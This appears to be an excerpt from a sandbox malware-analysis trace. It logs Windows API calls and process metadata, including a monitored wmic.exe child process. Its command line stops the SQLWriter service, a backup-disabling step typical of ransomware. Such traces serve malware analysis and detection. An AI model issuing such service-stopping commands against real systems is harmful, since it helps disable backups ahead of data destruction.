free (_Block=0xec9c0) [0245.652] free (_Block=0xe8500) [0245.652] free (_Block=0xec760) [0245.652] free (_Block=0xec780) [0245.652] free (_Block=0xe82c0) [0245.652] free (_Block=0xec7a0) [0245.652] free (_Block=0xec7c0) [0245.652] free (_Block=0xe8300) [0245.652] free (_Block=0xec8e0) [0245.652] free (_Block=0xec900) [0245.652] free (_Block=0xe8440) [0245.652] free (_Block=0xec920) [0245.652] free (_Block=0xec940) [0245.652] free (_Block=0xe8480) [0245.652] free (_Block=0xec6a0) [0245.652] free (_Block=0xec6c0) [0245.652] free (_Block=0xe8200) [0245.652] free (_Block=0xec560) [0245.652] free (_Block=0xec580) [0245.652] free (_Block=0xe80c0) [0245.652] free (_Block=0xe6f30) [0245.653] free (_Block=0xe6f50) [0245.653] free (_Block=0xe8080) [0245.653] free (_Block=0xec5e0) [0245.653] free (_Block=0xec600) [0245.653] free (_Block=0xe8140) [0245.653] free (_Block=0xec6e0) [0245.653] free (_Block=0xec700) [0245.653] free (_Block=0xe8240) [0245.653] free (_Block=0xec5a0) [0245.653] free (_Block=0xec5c0) [0245.653] free (_Block=0xe8100) [0245.653] free (_Block=0xec620) [0245.653] free (_Block=0xec640) [0245.653] free (_Block=0xe8180) [0245.653] free (_Block=0xec660) [0245.653] free (_Block=0xec680) [0245.653] free (_Block=0xe81c0) [0245.653] free (_Block=0xec720) [0245.653] free (_Block=0xec740) [0245.653] free (_Block=0xe8280) [0245.653] CoUninitialize () [0245.689] exit (_Code=0) [0245.690] free (_Block=0xecd30) [0245.690] free (_Block=0xe7f50) [0245.690] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0245.690] free (_Block=0xe7020) [0245.690] free (_Block=0xe6b20) [0245.690] free (_Block=0xe7f10) [0245.690] free (_Block=0xe7ed0) [0245.690] free (_Block=0xe7e80) [0245.690] free (_Block=0xe7e40) [0245.690] free (_Block=0xe5ac0) [0245.690] free (_Block=0xe7dc0) [0245.690] free (_Block=0xe5a80) [0245.690] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0245.690] free (_Block=0xe85c0) Thread: id = 161 os_tid = 0x52c Thread: id = 162 os_tid = 0x528 Thread: id = 163 os_tid = 0x49c Thread: id = 164 os_tid = 0x844 Thread: id = 165 os_tid = 0x5d0 Process: id = "19" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x13236000" os_pid = "0xbbc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x860" cmd_line = "\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%SQLWriter%%'\" call stopservice" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 167 os_tid = 0xbc0 [0245.887] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fc10 | out: lpSystemTimeAsFileTime=0x26fc10*(dwLowDateTime=0xa846a320, dwHighDateTime=0x1d61d49)) [0245.887] GetCurrentProcessId () returned 0xbbc [0245.887] GetCurrentThreadId () returned 0xbc0 [0245.887] GetTickCount () returned 0x1167427 [0245.887] QueryPerformanceCounter (in: lpPerformanceCount=0x26fc18 | out: lpPerformanceCount=0x26fc18*=36606072505) returned 1 [0245.890] GetModuleHandleW (lpModuleName=0x0) returned 0xffbf0000 [0245.890] __set_app_type (_Type=0x1) [0245.890] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffc3ced0) returned 0x0 [0245.891] __wgetmainargs (in: _Argc=0xffc62380, _Argv=0xffc62390, _Env=0xffc62388, _DoWildCard=0, _StartInfo=0xffc6239c | out: _Argc=0xffc62380, _Argv=0xffc62390, _Env=0xffc62388) returned 0 [0245.891] ??0CHString@@QEAA@XZ () returned 0xffc62ab0 [0245.891] malloc (_Size=0x30) returned 0x355a80 [0245.891] malloc (_Size=0x70) returned 0x357db0 [0245.891] malloc (_Size=0x50) returned 0x355ac0 [0245.891] malloc (_Size=0x30) returned 0x357e30 [0245.891] malloc (_Size=0x48) returned 0x357e70 [0245.891] malloc (_Size=0x30) returned 0x357ec0 [0245.891] malloc (_Size=0x30) returned 0x357f00 [0245.892] ??0CHString@@QEAA@XZ () returned 0xffc62f58 [0245.892] malloc (_Size=0x30) returned 0x357f40 [0245.892] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0245.892] SetConsoleCtrlHandler (HandlerRoutine=0xffc35724, Add=1) returned 1 [0245.892] _onexit (_Func=0xffc4f378) returned 0xffc4f378 [0245.892] _onexit (_Func=0xffc4f490) returned 0xffc4f490 [0245.892] _onexit (_Func=0xffc4f4d0) returned 0xffc4f4d0 [0245.892] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0245.892] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0245.896] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0245.906] CoCreateInstance (in: rclsid=0xffbf73a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffbf7370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xffc62940 | out: ppv=0xffc62940*=0x1da1390) returned 0x0 [0245.934] GetCurrentProcess () returned 0xffffffffffffffff [0245.934] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x26f9e0 | out: TokenHandle=0x26f9e0*=0xf4) returned 1 [0245.934] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26f9d8 | out: TokenInformation=0x0, ReturnLength=0x26f9d8) returned 0 [0245.934] malloc (_Size=0x118) returned 0x356990 [0245.934] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x356990, TokenInformationLength=0x118, ReturnLength=0x26f9d8 | out: TokenInformation=0x356990, ReturnLength=0x26f9d8) returned 1 [0245.934] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x356990*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=872116910, Attributes=0xd5e6), (Luid.LowPart=0x0, Luid.HighPart=3506048, Attributes=0x0), (Luid.LowPart=0x690057, Luid.HighPart=6553710, Attributes=0x77006f), (Luid.LowPart=0x790053, Luid.HighPart=7602291, Attributes=0x6d0065), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x6f0050, Luid.HighPart=6619255, Attributes=0x530072))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0245.934] free (_Block=0x356990) [0245.934] CloseHandle (hObject=0xf4) returned 1 [0245.934] malloc (_Size=0x40) returned 0x357f80 [0245.934] malloc (_Size=0x40) returned 0x356990 [0245.934] malloc (_Size=0x40) returned 0x3569e0 [0245.934] malloc (_Size=0x20a) returned 0x356a30 [0245.935] GetSystemDirectoryW (in: lpBuffer=0x356a30, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0245.935] free (_Block=0x356a30) [0245.935] malloc (_Size=0x18) returned 0x356a30 [0245.935] malloc (_Size=0x18) returned 0x356a50 [0245.935] malloc (_Size=0x18) returned 0x356a70 [0245.935] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0245.935] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0245.935] free (_Block=0x356a30) [0245.935] free (_Block=0x356a50) [0245.935] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0245.936] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0245.936] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0245.937] FreeLibrary (hLibModule=0x77940000) returned 1 [0245.937] free (_Block=0x356a70) [0245.937] _vsnwprintf (in: _Buffer=0x3569e0, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x26f608 | out: _Buffer="ms_409") returned 6 [0245.937] malloc (_Size=0x20) returned 0x356a30 [0245.937] GetComputerNameW (in: lpBuffer=0x356a30, nSize=0x26f9e0 | out: lpBuffer="XDUWTFONO", nSize=0x26f9e0) returned 1 [0245.938] lstrlenW (lpString="XDUWTFONO") returned 9 [0245.938] malloc (_Size=0x14) returned 0x356a60 [0245.938] lstrlenW (lpString="XDUWTFONO") returned 9 [0245.938] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x26f9d8 | out: lpNameBuffer=0x0, nSize=0x26f9d8) returned 0x7fffffde000 [0245.939] GetLastError () returned 0xea [0245.939] malloc (_Size=0x40) returned 0x356a80 [0245.939] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x356a80, nSize=0x26f9d8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26f9d8) returned 0x1 [0245.939] lstrlenW (lpString="") returned 0 [0245.939] lstrlenW (lpString="XDUWTFONO") returned 9 [0245.939] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0245.941] lstrlenW (lpString=".") returned 1 [0245.941] lstrlenW (lpString="XDUWTFONO") returned 9 [0245.941] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0245.941] lstrlenW (lpString="LOCALHOST") returned 9 [0245.941] lstrlenW (lpString="XDUWTFONO") returned 9 [0245.941] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0245.941] lstrlenW (lpString="XDUWTFONO") returned 9 [0245.942] lstrlenW (lpString="XDUWTFONO") returned 9 [0245.942] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0245.942] free (_Block=0x356a60) [0245.942] lstrlenW (lpString="XDUWTFONO") returned 9 [0245.942] malloc (_Size=0x14) returned 0x356a60 [0245.942] lstrlenW (lpString="XDUWTFONO") returned 9 [0245.942] lstrlenW (lpString="XDUWTFONO") returned 9 [0245.942] malloc (_Size=0x14) returned 0x356ad0 [0245.942] lstrlenW (lpString="XDUWTFONO") returned 9 [0245.942] malloc (_Size=0x8) returned 0x356af0 [0245.942] malloc (_Size=0x18) returned 0x356b10 [0245.942] malloc (_Size=0x30) returned 0x356b30 [0245.942] malloc (_Size=0x18) returned 0x356b70 [0245.942] SysStringLen (param_1="IDENTIFY") returned 0x8 [0245.942] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0245.942] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0245.942] SysStringLen (param_1="IDENTIFY") returned 0x8 [0245.942] malloc (_Size=0x30) returned 0x356b90 [0245.942] malloc (_Size=0x18) returned 0x356bd0 [0245.942] SysStringLen (param_1="IMPERSONATE") returned 0xb [0245.942] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0245.942] SysStringLen (param_1="IMPERSONATE") returned 0xb [0245.942] SysStringLen (param_1="IDENTIFY") returned 0x8 [0245.942] SysStringLen (param_1="IDENTIFY") returned 0x8 [0245.943] SysStringLen (param_1="IMPERSONATE") returned 0xb [0245.943] malloc (_Size=0x30) returned 0x356bf0 [0245.943] malloc (_Size=0x18) returned 0x356c30 [0245.943] SysStringLen (param_1="DELEGATE") returned 0x8 [0245.943] SysStringLen (param_1="IDENTIFY") returned 0x8 [0245.943] SysStringLen (param_1="DELEGATE") returned 0x8 [0245.943] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0245.943] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0245.943] SysStringLen (param_1="DELEGATE") returned 0x8 [0245.943] malloc (_Size=0x30) returned 0x356c50 [0245.943] malloc (_Size=0x18) returned 0x356c90 [0245.943] malloc (_Size=0x30) returned 0x356cb0 [0245.943] malloc (_Size=0x18) returned 0x356cf0 [0245.943] SysStringLen (param_1="NONE") returned 0x4 [0245.943] SysStringLen (param_1="DEFAULT") returned 0x7 [0245.943] SysStringLen (param_1="DEFAULT") returned 0x7 [0245.943] SysStringLen (param_1="NONE") returned 0x4 [0245.943] malloc (_Size=0x30) returned 0x356d10 [0245.943] malloc (_Size=0x18) returned 0x356d50 [0245.943] SysStringLen (param_1="CONNECT") returned 0x7 [0245.943] SysStringLen (param_1="DEFAULT") returned 0x7 [0245.943] malloc (_Size=0x30) returned 0x356d70 [0245.943] malloc (_Size=0x18) returned 0x356db0 [0245.943] SysStringLen (param_1="CALL") returned 0x4 [0245.943] SysStringLen (param_1="DEFAULT") returned 0x7 [0245.943] SysStringLen (param_1="CALL") returned 0x4 [0245.943] SysStringLen (param_1="CONNECT") returned 0x7 [0245.943] malloc (_Size=0x30) returned 0x356dd0 [0245.943] malloc (_Size=0x18) returned 0x356e10 [0245.944] SysStringLen (param_1="PKT") returned 0x3 [0245.944] SysStringLen (param_1="DEFAULT") returned 0x7 [0245.944] SysStringLen (param_1="PKT") returned 0x3 [0245.944] SysStringLen (param_1="NONE") returned 0x4 [0245.944] SysStringLen (param_1="NONE") returned 0x4 [0245.944] SysStringLen (param_1="PKT") returned 0x3 [0245.944] malloc (_Size=0x30) returned 0x356e30 [0245.944] malloc (_Size=0x18) returned 0x356e70 [0245.944] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0245.944] SysStringLen (param_1="DEFAULT") returned 0x7 [0245.944] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0245.944] SysStringLen (param_1="NONE") returned 0x4 [0245.944] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0245.944] SysStringLen (param_1="PKT") returned 0x3 [0245.944] SysStringLen (param_1="PKT") returned 0x3 [0245.944] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0245.944] malloc (_Size=0x30) returned 0x358000 [0245.945] malloc (_Size=0x18) returned 0x356e90 [0245.945] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0245.945] SysStringLen (param_1="DEFAULT") returned 0x7 [0245.945] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0245.945] SysStringLen (param_1="PKT") returned 0x3 [0245.945] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0245.945] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0245.945] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0245.945] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0245.945] malloc (_Size=0x30) returned 0x358040 [0245.945] malloc (_Size=0x40) returned 0x356eb0 [0245.945] malloc (_Size=0x20a) returned 0x356f00 [0245.945] GetSystemDirectoryW (in: lpBuffer=0x356f00, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0245.945] free (_Block=0x356f00) [0245.945] malloc (_Size=0x18) returned 0x356f00 [0245.945] malloc (_Size=0x18) returned 0x356f20 [0245.945] malloc (_Size=0x18) returned 0x356f40 [0245.945] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0245.945] SysStringLen (param_1="\\wbem\\") returned 0x6 [0245.945] free (_Block=0x356f00) [0245.945] free (_Block=0x356f20) [0245.945] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0245.946] free (_Block=0x356f40) [0245.946] malloc (_Size=0x18) returned 0x356f00 [0245.946] malloc (_Size=0x18) returned 0x356f20 [0245.946] malloc (_Size=0x18) returned 0x356f40 [0245.946] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0245.946] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0245.946] free (_Block=0x356f00) [0245.946] free (_Block=0x356f20) [0245.946] GetCurrentThreadId () returned 0xbc0 [0245.946] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x26f2e0 | out: phkResult=0x26f2e0*=0xf8) returned 0x0 [0245.946] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x26f330, lpcbData=0x26f2d0*=0x400 | out: lpType=0x0, lpData=0x26f330*=0x30, lpcbData=0x26f2d0*=0x4) returned 0x0 [0245.946] _wcsicmp (_String1="0", _String2="1") returned -1 [0245.946] _wcsicmp (_String1="0", _String2="2") returned -2 [0245.946] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x26f2d0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x26f2d0*=0x42) returned 0x0 [0245.946] malloc (_Size=0x86) returned 0x356f60 [0245.946] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x356f60, lpcbData=0x26f2d0*=0x42 | out: lpType=0x0, lpData=0x356f60*=0x25, lpcbData=0x26f2d0*=0x42) returned 0x0 [0245.946] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0245.946] malloc (_Size=0x42) returned 0x356ff0 [0245.946] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0245.947] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x26f330, lpcbData=0x26f2d0*=0x400 | out: lpType=0x0, lpData=0x26f330*=0x36, lpcbData=0x26f2d0*=0xc) returned 0x0 [0245.947] _wtol (_String="65536") returned 65536 [0245.947] free (_Block=0x356f60) [0245.947] RegCloseKey (hKey=0x0) returned 0x6 [0245.947] CoCreateInstance (in: rclsid=0xffbf7410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffbf73f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x26f7d8 | out: ppv=0x26f7d8*=0x22d71d0) returned 0x0 [0245.968] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x22d71d0, xmlSource=0x26f920*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x356f00), isSuccessful=0x26f990 | out: isSuccessful=0x26f990*=0xffff) returned 0x0 [0246.114] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x22d71d0, DOMElement=0x26f7d0 | out: DOMElement=0x26f7d0*=0x22dbc50) returned 0x0 [0246.115] malloc (_Size=0x18) returned 0x35c560 [0246.115] IXMLDOMElement:getElementsByTagName (in: This=0x22dbc50, tagName="XSLFORMAT", resultList=0x26f7e0 | out: resultList=0x26f7e0*=0x22d9cc0) returned 0x0 [0246.116] free (_Block=0x35c560) [0246.116] IXMLDOMNodeList:get_length (in: This=0x22d9cc0, listLength=0x26f9a8 | out: listLength=0x26f9a8*=21) returned 0x0 [0246.116] IXMLDOMNodeList:get_item (in: This=0x22d9cc0, index=0, listItem=0x26f7b0 | out: listItem=0x26f7b0*=0x22dbd50) returned 0x0 [0246.116] IXMLDOMNode:get_text (in: This=0x22dbd50, text=0x26f7c0 | out: text=0x26f7c0*="texttable.xsl") returned 0x0 [0246.116] IXMLDOMNode:get_attributes (in: This=0x22dbd50, attributeMap=0x26f7b8 | out: attributeMap=0x26f7b8*=0x22d78d0) returned 0x0 [0246.117] malloc (_Size=0x18) returned 0x35c560 [0246.117] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22d78d0, name="KEYWORD", namedItem=0x26f7c8 | out: namedItem=0x26f7c8*=0x22da280) returned 0x0 [0246.117] free (_Block=0x35c560) [0246.117] IXMLDOMNode:get_nodeValue (in: This=0x22da280, value=0x26f800 | out: value=0x26f800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x4)) returned 0x0 [0246.117] malloc (_Size=0x18) returned 0x35c560 [0246.117] malloc (_Size=0x18) returned 0x35c580 [0246.117] malloc (_Size=0x30) returned 0x358080 [0246.117] IUnknown:Release (This=0x22dbd50) returned 0x0 [0246.117] IUnknown:Release (This=0x22d78d0) returned 0x0 [0246.117] IUnknown:Release (This=0x22da280) returned 0x0 [0246.117] IXMLDOMNodeList:get_item (in: This=0x22d9cc0, index=1, listItem=0x26f7b0 | out: listItem=0x26f7b0*=0x22dbd50) returned 0x0 [0246.117] IXMLDOMNode:get_text (in: This=0x22dbd50, text=0x26f7c0 | out: text=0x26f7c0*="textvaluelist.xsl") returned 0x0 [0246.117] IXMLDOMNode:get_attributes (in: This=0x22dbd50, attributeMap=0x26f7b8 | out: attributeMap=0x26f7b8*=0x22d78d0) returned 0x0 [0246.117] malloc (_Size=0x18) returned 0x35c5a0 [0246.118] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22d78d0, name="KEYWORD", namedItem=0x26f7c8 | out: namedItem=0x26f7c8*=0x22da280) returned 0x0 [0246.118] free (_Block=0x35c5a0) [0246.118] IXMLDOMNode:get_nodeValue (in: This=0x22da280, value=0x26f800 | out: value=0x26f800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x4)) returned 0x0 [0246.118] malloc (_Size=0x18) returned 0x35c5a0 [0246.118] malloc (_Size=0x18) returned 0x35c5c0 [0246.118] SysStringLen (param_1="VALUE") returned 0x5 [0246.118] SysStringLen (param_1="TABLE") returned 0x5 [0246.118] SysStringLen (param_1="TABLE") returned 0x5 [0246.118] SysStringLen (param_1="VALUE") returned 0x5 [0246.118] malloc (_Size=0x30) returned 0x3580c0 [0246.118] IUnknown:Release (This=0x22dbd50) returned 0x0 [0246.118] IUnknown:Release (This=0x22d78d0) returned 0x0 [0246.118] IUnknown:Release (This=0x22da280) returned 0x0 [0246.118] IXMLDOMNodeList:get_item (in: This=0x22d9cc0, index=2, listItem=0x26f7b0 | out: listItem=0x26f7b0*=0x22dbd50) returned 0x0 [0246.118] IXMLDOMNode:get_text (in: This=0x22dbd50, text=0x26f7c0 | out: text=0x26f7c0*="textvaluelist.xsl") returned 0x0 [0246.118] IXMLDOMNode:get_attributes (in: This=0x22dbd50, attributeMap=0x26f7b8 | out: attributeMap=0x26f7b8*=0x22d78d0) returned 0x0 [0246.118] malloc (_Size=0x18) returned 0x35c5e0 [0246.118] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22d78d0, name="KEYWORD", namedItem=0x26f7c8 | out: namedItem=0x26f7c8*=0x22da280) returned 0x0 [0246.118] free (_Block=0x35c5e0) [0246.118] IXMLDOMNode:get_nodeValue (in: This=0x22da280, value=0x26f800 | out: value=0x26f800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x4)) returned 0x0 [0246.119] malloc (_Size=0x18) returned 0x35c5e0 [0246.119] malloc (_Size=0x18) returned 0x35c600 [0246.119] SysStringLen (param_1="LIST") returned 0x4 [0246.119] SysStringLen (param_1="TABLE") returned 0x5 [0246.119] malloc (_Size=0x30) returned 0x358100 [0246.119] IUnknown:Release (This=0x22dbd50) returned 0x0 [0246.119] IUnknown:Release (This=0x22d78d0) returned 0x0 [0246.119] IUnknown:Release (This=0x22da280) returned 0x0 [0246.119] IXMLDOMNodeList:get_item (in: This=0x22d9cc0, index=3, listItem=0x26f7b0 | out: listItem=0x26f7b0*=0x22dbd50) returned 0x0 [0246.119] IXMLDOMNode:get_text (in: This=0x22dbd50, text=0x26f7c0 | out: text=0x26f7c0*="rawxml.xsl") returned 0x0 [0246.119] IXMLDOMNode:get_attributes (in: This=0x22dbd50, attributeMap=0x26f7b8 | out: attributeMap=0x26f7b8*=0x22d78d0) returned 0x0 [0246.119] malloc (_Size=0x18) returned 0x35c620 [0246.119] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22d78d0, name="KEYWORD", namedItem=0x26f7c8 | out: namedItem=0x26f7c8*=0x22da280) returned 0x0 [0246.119] free (_Block=0x35c620) [0246.119] IXMLDOMNode:get_nodeValue (in: This=0x22da280, value=0x26f800 | out: value=0x26f800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x4)) returned 0x0 [0246.119] malloc (_Size=0x18) returned 0x35c620 [0246.119] malloc (_Size=0x18) returned 0x35c640 [0246.120] SysStringLen (param_1="RAWXML") returned 0x6 [0246.120] SysStringLen (param_1="TABLE") returned 0x5 [0246.120] SysStringLen (param_1="RAWXML") returned 0x6 [0246.120] SysStringLen (param_1="LIST") returned 0x4 [0246.120] SysStringLen (param_1="LIST") returned 0x4 [0246.120] SysStringLen (param_1="RAWXML") returned 0x6 [0246.120] malloc (_Size=0x30) returned 0x358140 [0246.120] IUnknown:Release (This=0x22dbd50) returned 0x0 [0246.120] IUnknown:Release (This=0x22d78d0) returned 0x0 [0246.120] IUnknown:Release (This=0x22da280) returned 0x0 [0246.120] IXMLDOMNodeList:get_item (in: This=0x22d9cc0, index=4, listItem=0x26f7b0 | out: listItem=0x26f7b0*=0x22dbd50) returned 0x0 [0246.120] IXMLDOMNode:get_text (in: This=0x22dbd50, text=0x26f7c0 | out: text=0x26f7c0*="htable.xsl") returned 0x0 [0246.120] IXMLDOMNode:get_attributes (in: This=0x22dbd50, attributeMap=0x26f7b8 | out: attributeMap=0x26f7b8*=0x22d78d0) returned 0x0 [0246.120] malloc (_Size=0x18) returned 0x35c660 [0246.120] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22d78d0, name="KEYWORD", namedItem=0x26f7c8 | out: namedItem=0x26f7c8*=0x22da280) returned 0x0 [0246.120] free (_Block=0x35c660) [0246.120] IXMLDOMNode:get_nodeValue (in: This=0x22da280, value=0x26f800 | out: value=0x26f800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x4)) returned 0x0 [0246.120] malloc (_Size=0x18) returned 0x35c660 [0246.120] malloc (_Size=0x18) returned 0x35c680 [0246.120] SysStringLen (param_1="HTABLE") returned 0x6 [0246.120] SysStringLen (param_1="TABLE") returned 0x5 [0246.121] SysStringLen (param_1="HTABLE") returned 0x6 [0246.121] SysStringLen (param_1="LIST") returned 0x4 [0246.121] malloc (_Size=0x30) returned 0x358180 [0246.121] IUnknown:Release (This=0x22dbd50) returned 0x0 [0246.121] IUnknown:Release (This=0x22d78d0) returned 0x0 [0246.121] IUnknown:Release (This=0x22da280) returned 0x0 [0246.121] IXMLDOMNodeList:get_item (in: This=0x22d9cc0, index=5, listItem=0x26f7b0 | out: listItem=0x26f7b0*=0x22dbd50) returned 0x0 [0246.121] IXMLDOMNode:get_text (in: This=0x22dbd50, text=0x26f7c0 | out: text=0x26f7c0*="hform.xsl") returned 0x0 [0246.121] IXMLDOMNode:get_attributes (in: This=0x22dbd50, attributeMap=0x26f7b8 | out: attributeMap=0x26f7b8*=0x22d78d0) returned 0x0 [0246.121] malloc (_Size=0x18) returned 0x35c6a0 [0246.121] 